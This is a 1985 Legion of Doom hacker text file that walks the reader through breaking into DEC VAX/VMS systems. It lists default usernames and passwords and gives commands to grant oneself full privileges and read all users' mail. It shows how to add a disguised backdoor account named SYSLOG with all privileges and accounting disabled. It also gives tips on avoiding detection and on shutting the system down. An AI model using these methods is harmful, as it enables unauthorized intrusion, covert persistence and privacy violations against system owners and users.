Lex Luthor and The Legion Of Doom/Hackers Present:               

       HACKING VAX'S VMS  Part I                  

    This file will list most default accounts/passwords,  commands 
for non-privileged accts and commands for privileged accounts, how
to set up your own acct, list users and how to shut down the system. 
                                   
  (C)    WRITTEN 10-APR-85         
  Written by:  LOD/H               


INTRODUCTION:
-------------

   The VAX is made by DEC  (Digital Equipment Corp) and can run
a variety of operating systems.  In this file, I will talk about
the VMS (Virtual Memory Operating System), VMS. The VAX is a 32
bit machine with 32 bit virtual address space.

ENTRANCE:
---------

   When you first connect with a VAX you type either a return, a
ctrl-c, or a ctrl-y.  It will then respond with something
similar to:

   LOD/H NETWORK COMMUNICATIONS RESEARCH SYSTEM VMS V4.0

   Username:
   Password:

   The most frequent way of gaining access to a computer system
is by using a 'default' login/password. In this example you may
try LOD as the username and RESEARCH as the password or a
combination of words in the opening banner (if there is one)
which may allow you access, otherwise you will have to try the
DEFAULT METHOD of entry.  The version listed above (V4.0) is the
latest  version to my knowledge of VMS.  The more widely used
version that I have seen is V3.7.

   When DEC sells a VAX/VMS, the system comes equiped with 4
accounts which are:

   DEFAULT -- This serves as a template in creating user records
in the UAF  (User Authorization  File). A new user record is
assigned the values of the DEFAULT record except where the
system manager changes those values.  The DEFAULT record can be
modified but cannot be deleted from the UAF.

   SYSTEM  --  Provides a means for the system manager to log in
with full privileges. The SYSTEM record can be modified but
cannot be deleted from the UAF.

   FIELD -- Permits DIGITAL field service personnel to check out
a new system.  The FIELD record can be deleted once the system
is installed.  @ SYSTEST -- Provides an appropriate environment
for running the User  Environment Test Package (UETP). The
SYSTEST record can be deleted once the system is installed.

   Usually the SYSTEM MANAGER adds, deletes, and modifies these
records which are in the UAF when the system arrives, thus,
eliminating the default passwords, but this is not true in all
cases.

   The 'default' passwords that I have found to get me into a
system are:

   Username:    Password:
   ---------    ---------
    SYSTEM       MANAGER or OPERATOR
    FIELD        SERVICE or TEST
    DEFAULT      USER or DEFUALT
    SYSTEST      UETP or SYSTEST

   Other typical VMS accounts are:

       VAX          VAX
       VMS          VMS
       DCL          DCL
       DEMO         DEMO
       TEST         TEST
       HELP         HELP
       NEWS         NEWS
       GUEST        GUEST
       GAMES        GAMES
       DECNET       DECNET

   Or a combination of the various usernames and passwords. If
none of these get you in, then you should move on to the next
system unless you have a way to get usernames/passwords, like
from trashing, stealing passwords directly, or  by some other
means.

YOUR IN!
--------

   You will know that you are in by recieving the prompt of a
dollar sign  '$'. You will be popped into the default directory
which is dependent on what account you are logged in as.  If you
get in as the system manager, you have full access if you get in
on the field or systest accounts you may or may not have full
access but you will have the privileges to give yourself full
access. To give privs to yourself:

   $ SET PROCESS /PRIVS=ALL

   Once you have full privs, you can access any directory and
any file, and also run the AUTHORIZE pgm which will be
explained.

   The VMS system has full help files available by typing HELP.
You can use  the wildcard character of an '*' to list out info
on every command:

   $ HELP *

   When you first logon, it may be to your advantage to get a
list of all users currently logged onto the system if there are
any at all.  You can do this by:

   $ SHOW USERS

   VAX/VMS Interactive Users - Total = 4
   01-MAY-1985 11:37:21.73

   OPA0:         DEMO         004C004C
   TTD2:         LAWRENCL     0059004A
   TXB1:         FIELD        008D004E
   TXB3:         TWYLYSYS     01190057

   It is highly recommended that if you are logged on in the day
and there are people logged in, especially the system manager or
the account you are logged on as, logout and call back later. I
have found that no matter what system you are on, the best way
to remain undetected is to call when no one is on the system.
You do not want to call too late since the system keeps a record
of when each user logs in and out.

   To communicate with other users or other hackers that you are
on the system with, use the PHONE Utility.

   $ PHONE Username

   If the system has DEC-net, you can see what available nodes
there are by:

   $ SHOW NETWORK

   If you have mail the system will tell you so after logging
in, simply type:

   $ MAIL

   This will invoke the Personal Mail Utility, you can use help
from there.

   There are a lot of commands and many are not too useful, (to
the hacker anyway), so I will not go into detail.  One thing
about VMS, there is plenty of on-line help available which will
enable you to learn the operating system fairly well.

DIRECTORIES:
------------

   To see what you have in your directory type:

   $ DIR

   To get a list of directories on the system type:

   $ DIR <*.*>

   When a VAX/VMS is first installed,  it comes with nine
directories which are not listed when you execute the DIR <*.*>
command:

   <SYSLIB>
   This directory contains various macro and object libraries.

   <SYSMSG>
   This directory contains system message files.

   <SYSMGR>
   This directory contains files used in managing the operating system.

   <SYSHLP>
   This directory contains text files and help libraries for the
   HELP utility.

   <SYSERR>
   This is the directory for the error log file (ERRLOG.SYS).

   <SYSTEST>
   This directory contains files used in testing the functions
   of the operating system.

   <SYSMAINT>
   This directory contains system diagnostic programs.

   <SYSUPD>
   This directory contains files used in applying system updates.

   <SYSUPD.EXAMPLES>
   This directory contains sample driver programs, user-written
   system services, and other source programs.

   <SYSEXE>
   This directory contains the executable images of most of the
   functions of the operating system.

   Inside these directories are files with the following file-types:

   File-type ! Description:     ! Command:
   ----------+------------------+-------------------------
    .txt     ! Ascii text file  ! TYPE file-name
    .hlp     ! System Help file ! TYPE file-name
    .dat     ! Data file        ! TYPE file-name
    .msg     ! Message file     ! TYPE file-name
    .doc     ! Documentation    ! TYPE file-name
    .log     ! Log file         ! TYPE file-name
    .err     ! Error msg file   ! TYPE file-name
    .seq     ! Sequential file  ! TYPE file-name
    .sys     ! System file      ! FILE-NAME
    .exe     ! Executable file  ! FILE-NAME
    .com     ! Command file     ! COMMAND NAME
    .bas     ! Basic file       ! RUN file-name
   ----------+------------------+------------------------

   There are others but you won't see them as much as the above.
You can change directories either by using the CHANGE command or
by using the SET  DEFAULT command:

   $ CHANGE <DIR.NAM>
            or
   $ SET DEFAULT <DIR.NAM>

   You can now list and execute the files in this directory
without first typing the directory name followed by the file
name as long as you have sufficient access.  If you don't have
sufficient access you can still view files within directories
that you cannot default to by:

   $ TYPE <LOD.DIR>LOD.MAI;1

   This will list the contents of the file LOD.MAI;1 in the
directory of <LOD.DIR>.

   The use of wildcards is very helpful when you desire to view,
all the mail or something on a system.  To list out all the
users mail if you have access type:

   $ TYPE <*.*>*.MAI;*

   As you may notice mail files have the extension of MAI at the
end.  The ;1 or ;2 etc. are used to number files with the same
name.

PRIVILEGES
-----------

   Privileges fall into seven categories according to the damage
that the user possessing them could cause the system:

   None   - No privileges
   Normal - Minimum privileges to efectively use the system
   Group  - Potential to interfere with members of the same group
   Devour - Potential to devour noncritical system-wide resources
   System - Potential to interfere with normal system operation
   File   - Potential to compromise file security
   All    - Potential to control the system (hehe)

THE UAF
-------

   The User Authorization File contains the names of users who
may log into the system and also contains a record of the user's
privileges. Each record in the  UAF includes the following:

   1. Name and Password

   2. User Identification Code (UIC) -- Identifies a user by a
group number and a  member number.  

   3. Default file specification -- Has the default device and
directory names for file access.  

   4. Login command file -- Names a command procedure to be
executed automatically at login time.

   5. Login flags -- Allows the system manager to inhibit the
use of the CTRL-Y function, and lock user passwords.  

   6.  Priority -- Specifies the base priority of the process
created by the user at login time.  

   7. Resources -- Limits the system resources the user may
perform.

   8. Privileges -- Limits activities the user may perform.

   If you have SYSTEM MANAGER privileges, you will be able to
add, delete, and modify records in the UAF.

   The AUTHORIZE Utility allows you to modify the information in
the UAF.  It is usually found in the <SYSEXE> directory.  The
commands for AUTHORIZE are: 

ADD username <qualifier..>  Adds a record to the UAF

EXIT (or CTRL-Z)            Returns you to command level

HELP                        Lists the AUTHORIZE commands

LIST <userspec> </FULL>     Creates a listing file of UAF
                            records

MODIFY username             Modifies a record 

REMOVE username             Deletes a record

SHOW Displays UAF records

   The most useful besides ADD is the SHOW command.  SHOW
displays reports for selected UAF records.  You can get a /BRIEF
listing or a /FULL listing.  But before you do that, you may
want to make sure no one is logged on besides you. And to make
sure no one can log on, you do this by:

   $ SET LOGINS /INTERACTIVE=0

   This establishes the maximum number of users able to log in
to the system, this command does not effect users currently
logged on.  I never do the above since it is not really needed
and looks very suspicious.  Now, to list out the userfile do the
following:

   $ SET DEFAULT <SYSEXE>
   $ RUN AUTHORIZE
   UAF> SHOW * /BRIEF

Owner          Username  UIC       Acct  Privs  Pri Default Dir.

SYSTEM MANAGER  SYSTEM  <001,004>  SYSTEM  All    4 SYS$SYSROOT:
FIELD SERVICE   FIELD   <001,010>  FIELD   All    4 SYS$SYSROOT:

   To get a full report:

   (if you used the SET DEFAULT cmd earlier and the default dir
is the <SYSEXE> directory, then you don't have to re-type it).

   $ RUN AUTHORIZE (or if you still have the UAF> prompt):

   UAF> SHOW * /FULL

   Username:  SYSTEM             Owner:  SYSTEM MANGER
   Account:   SYSTEM             UIC:    <001,004>
   CLI:       DCL                LGICMD:
   Default Device: SYS$ROOT:
   Default Directory: <SYSMGR>
   Login Flags:
   Primary days:   Mon Tue Wed Thu Fri
   Secondary days:                     Sat Sun
   No hourly restrictions
   PRIO:     4  BYTLM:         20480  BIOLM:            12
   PRCLM:   10  PBYTLM:            0  DIOLM:            12
   ASTLM:   20  WSDEFAULT:       150  FILLM:            20
   ENQLM:   20  WSQUOTA:         350  SHRFILLM:          0
   TQELM:   20  WSECTENT:       1024  CPU:        no limit
   MAXJOBS:  0  MAXACCTJOBS:       0  PGFLQUOTA:    200000
   Privileges:
   CMKRNL CMEXEC SYSNAM GRPNAM ALLSPOOL DETACH DIAGNOSE LOG-IO
   GROUP ACNT PRMCEB
   PRMMBX PSWAPM ALTPRI SETPRV TMPMBX WORLD OPER EXQUOTA NETMBX
   VOLPRO PHY-IO
   BUGCHK PRMGBL SYSGBL MOUNT  PFNMAP SHMEM SYSPRV SYSCLK

   UAF>

   Unfortunately, you cannot get a listing of passwords, though,
you can get the list of users as shown above.  The passwords are
encrypted just like a UNIX system, buw you cannot even see the
encrypted password unless you look at the actual file that the
UAF> draws it's information from.

   After listing out all the users, you figure that since all
these other people are on here, why can't I have my own account?
Well, if you have sufficient privs, you can!

   UAF>ADD SYSLOG /PASSWORD=LEGION /UIC=<014,006> /CPUTIME=0
   /DEVICE=SYS$SYSROOT-
   -/ACCOUNT=VMS /DIRECTORY=<SYSERR> /PRIVS=ALL /OWNER=DIGITAL
   /NOACCOUNTING

   1) You ADD the username SYSLOG (you do not want to create a
user like: Lex,  since it will be too obvious and not look
right.  I have had much success in not being detected with this
acct.

2) You specify the password for the SYSLOG account.

3) You assign a UIC (User Ident Code) which consists of two
numbers in the range of 0 through 377, separated by a comma and
enclosed in brackets.  The system assigns a UIC to a detached
process created for the user at login time.  User processes pass
on this UIC to any subprocesses they create. Processes can
further assign UICs to files, mailboxes, devices, etc.  You can
assign the same UIC to more than 1 user.

4) CPUTIME is in delta format, 0 means INFINITE, which is what
we will use.

5) You specify the DEVICE that is allocated to the user when
they login, which  for our purposes, is the SYS$SYSROOT device,
other devices are: SYS$DEVICE,    SYS$SYSDISK, DB1, etc.

6) Specifying an account is not necessary, but if you do, use
one that is listed as another users', since you don't want to
attract too much attention to the account.

7) The default directory can be a directory currently on the
system or it can be created after the UAF record is added.  You
may want to use one of the ones  mentioned earlier in the file,
but be sure not to use the <SYSMGR> directory.

8) You can select one of the privileges listed earlier in this
file, we will use, of course, ALL.

9) OWNER is similar to the ACCOUNT qualifier, again, look at
what the other users have listed.

10) NOACCOUNTING will disable system accounting records, thus,
not adding information to the ACCOUNTING.DAT file.

  After the UAF record is successfully added, you should create
a directory by specifying the device name, directory name, and
UIC of the UAF record. Protection for the 'ordinary' user is
normally, Read, Write, Execute, and Delete access for system,
owner, and group processes, and read and execute access for
world processes.  To create a directory:

  $ CREATE SYS$SYSROOT:<SYSLOG> /DIRECTORY /OWNER-UIC=<014,006>


ACCOUNTING:
-----------

   For accounting purposes, the VAX/VMS system keeps records of
the use of the system resources.  These records are kept in the
accounting log file:

   SYS$SYSDISK:<SYSMGR>ACCOUNTING.DAT, which is updated each
time an accountable process terminates, each time a print job is
completed and each time a login failure occurs.  In addition,
users can send messages to be inserted into the accounting log
file.

   To surpress the accounting function and thus avoid accounting
for the use of system resources requires privilege.  The
/NOACCOUNTING qualifier is used to disable all accounting in a
created process.

   You may want to see how often the account you are using or
another account logs in, you can do this by:

   $ ACCOUNTING /USER=(SYSLOG)

Date / Time          Type     Subtype    Username  ID     Source
----------------------------------------------------------------
30-JAN-1985 00:20:56 PROCESS INTERACTIVE SYSLOG  000000C5 NONE  
12-FEB-1985 04:11:34 PROCESS INTERACTIVE SYSLO   000000A9 NONE  
01-MAY-1985 10:40:22 PROCESS INTERACTIVE SYSLOG  000000C4 NONE  

   This is the accounting information for the user:SYSLOG which
shows that the user has logged on three times so far.  Some
users may be on hundreds of times, thus, it would be an ideal
account to use/abuse since it will not be likely that the
unauthorize accesses will be detected.

LOGGING OFF:
------------

   Simply type:

   $ LOGOUT

   The system will display the usual CPU time used and other
statistics.

SHUTTING DOWN THE SYSTEM:
-------------------------

   Many files I have read tell you how to destroy a system, shut
it down etc.  I do not recommend nor practice any type of
malicious activities.  Though, I do realize that in the process
of gaining access to a system, the Hacker or System Cracker
which ever you prefer, gets bored or learns as much as he wants
to learn about the system.  I will explain how to shutdown the
system correctly, this can be used in case you think you screwed
the system and shutting down the system may be the only way to
avoid considerable damage.

   The normal reasons for shutting down the system are: danger
of power loss, need to backup the system disk, hardware or
software problems, or to use the system for a specific
application.  Below is the command procedure which describes how
to shut down the system in an orderly fashion.  This procedure
is contained in a command file.

   PROCEDURE:

   1) Type the following command to begin the shutdown procedure:

   $ @SYS$SYSTEM:SHUTDOWN

   2) Enter time till shutdown:

   How many minutes until shutdown?:5

   3) You will now have to give the reason for shutting it down:

   Reason?:possible system damage

   4) Respond to typing a Y or N to the following question:

   Do you want to spin down the disks?:N

   After a short period the message:

   SYSTEM SHUTDOWN COMPLETE - USE CONSOLE TO HALT SYSTEM

   At this point, the system cannot be totally shut down, but
all processes are halted, thus, not causing any further damage
to the system. (remember the reason you should have shut it down
was because potential damage to the system could have occured
and you were acting in the best interest of the system) yeah
sure.

READING MATERIAL:
-----------------

   For general background information about the VAX/VMS system,
see the VAX/VMS Primer and the VAX/VMS Summary Description and
Glossary.  The following VAX/VMS documents may also be useful:

   o VAX/VMS Command Language User's Guide
   o VAX/VMS Guide to Using Command Procedures
   o VAX/VMS Release notes
   o VAX-11  RSX-11M User's Guide
   o VAX-11  Software Installation Guide
   o VAX/VMS System Manager's Guide
   o VAX/VMS System Messages and Recovery Procedures Manual
   o VAX-11  Utilities Reference Manual
   o RMS-11  User's Guide

   For controlling network operations, refer to the DECNET-VAX
System Manager's Guide.

    Lex Luthor
    Legion Of Hackers!
